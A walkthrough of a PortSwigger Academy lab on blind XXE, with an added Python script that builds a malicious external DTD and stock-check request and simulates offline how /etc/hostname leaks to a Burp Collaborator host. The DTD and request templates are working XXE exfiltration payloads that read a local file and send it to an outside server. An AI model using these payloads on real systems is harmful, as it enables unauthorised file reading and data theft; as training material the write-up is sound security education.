Solving Portswigger Academy: Exploiting blind XXE to exfiltrate data using a malicious external DTD
This lab has a “Check stock” feature that parses XML input but does not display the result.
To solve the lab, exfiltrate the contents of the /etc/hostname file.
Access the lab and view details of any product, then check for available stock.

First, use Burp Collaborator to check whether the XML parser will make outbound requests at all. After sending the request below, which points an external entity at the Collaborator payload URL, Collaborator shows both DNS and HTTP interactions: the parser resolves external entities and can reach a server we control.


The payload below exfiltrates the hostname.

The malicious DTD has to be hosted on a server we control; the lab provides an exploit server for this. Open the exploit server, paste the DTD contents shown below into the response body, and store it. Once it is stored, copy the URL at which the exploit server serves the DTD file, because the next step needs it.

Note that the http URL inside the DTD must be your Burp Collaborator payload URL; that is where the parser will send the file contents.
Now go back to Repeater and, in the DOCTYPE of the stock-check request, define a parameter entity whose SYSTEM URL is the exploit server URL copied above, then reference that entity so the parser fetches and evaluates the external DTD.

After a few seconds, click Poll now in the Collaborator tab. You will see DNS and HTTP interactions; the HTTP interaction contains a GET request whose query parameter x carries the contents of /etc/hostname, i.e. the lab's hostname.
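As an added example, not code from the original post or from the lab, the following Python models the three parties in this chain offline: it builds the DTD that the exploit server hosts and the stock-check request body that references it, emulates by plain string substitution (not a real XML parser) how an entity-resolving parser expands %file; into the Collaborator URL, and parses the GET request line that appears in Collaborator to recover the value. The Collaborator host, the exploit-server URL, the stockCheck/productId/storeId element names and the sample hostname are placeholders chosen for the example. It also shows the caveat a practitioner should expect: the file's contents end up inside a URL, so this variant works cleanly for single-line files like /etc/hostname, while a multi-line file such as /etc/passwd yields a URL with newlines and needs a different technique.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Placeholders (assumptions, not the real lab values).
COLLAB_HOST = "abcd1234.oastify.com"
DTD_URL = "https://exploit-0a00.exploit-server.net/exploit.dtd"


def build_malicious_dtd(collab_host: str, target_path: str = "/etc/hostname") -> str:
    """DTD to host on the exploit server.

    %file; reads the target file. %eval; declares a second parameter entity,
    %exfil;, whose SYSTEM URL embeds %file; in the query string. &#x25; is '%'
    encoded so the inner declaration is only created when %eval; is expanded.
    A parameter-entity reference inside an entity value is not permitted in the
    internal DTD subset, which is why this DTD must be hosted externally.
    """
    return (
        f'<!ENTITY % file SYSTEM "file://{target_path}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'http://{collab_host}/?x=%file;'\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def build_stock_check_body(dtd_url: str, product_id: int = 1, store_id: int = 1) -> str:
    """Request body for the stock-check endpoint with a DOCTYPE that pulls in the
    external DTD. Element names are assumed; adjust them to the real request."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "{dtd_url}"> %xxe;]>\n'
        f"<stockCheck><productId>{product_id}</productId>"
        f"<storeId>{store_id}</storeId></stockCheck>"
    )


def simulate_parser(dtd: str, file_contents: str) -> str:
    """Text-level emulation of an entity-resolving parser handling the DTD.
    Returns the URL the parser would request when %exfil; is expanded.
    This is string substitution only, not a real XML parser."""
    if "%eval;" not in dtd or "%exfil;" not in dtd:
        raise ValueError("DTD never references %eval; or %exfil;")
    m = re.search(r'<!ENTITY % eval "(.*)">', dtd)
    if not m:
        raise ValueError("no %eval; declaration found")
    # Expanding %eval; substitutes %file; and turns &#x25; back into '%'.
    inner = m.group(1).replace("%file;", file_contents).replace("&#x25;", "%")
    m = re.search(r"<!ENTITY % exfil SYSTEM '([^']*)'", inner)
    if not m:
        raise ValueError("expanded %eval; did not yield an exfil declaration")
    return m.group(1)


def is_single_line(file_contents: str) -> bool:
    """The value travels inside a URL, so embedded newlines break this variant."""
    return "\n" not in file_contents.rstrip("\n")


def recover_exfiltrated_value(request_line: str) -> str:
    """Parse the request line shown in the Collaborator HTTP interaction."""
    path = request_line.split(" ")[1]
    return parse_qs(urlsplit(path).query)["x"][0]


if __name__ == "__main__":
    dtd = build_malicious_dtd(COLLAB_HOST)
    print(dtd)
    print(build_stock_check_body(DTD_URL))
    # Constructed sample file contents, not read from this machine.
    hostname = "lab-target-host"
    url = simulate_parser(dtd, hostname)
    print("parser would fetch:", url)
    print("recovered:", recover_exfiltrated_value(f"GET /?x={hostname} HTTP/1.1"))
    print("/etc/passwd single line?",
          is_single_line("root:x:0:0:root:/root:/bin/bash\nbin:x:1:1::/bin:/usr/sbin/nologin\n"))
```

The order of the last two DTD lines matters: %eval; must be expanded first so that the %exfil; declaration exists, and only then does referencing %exfil; trigger the outbound request carrying the file contents.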
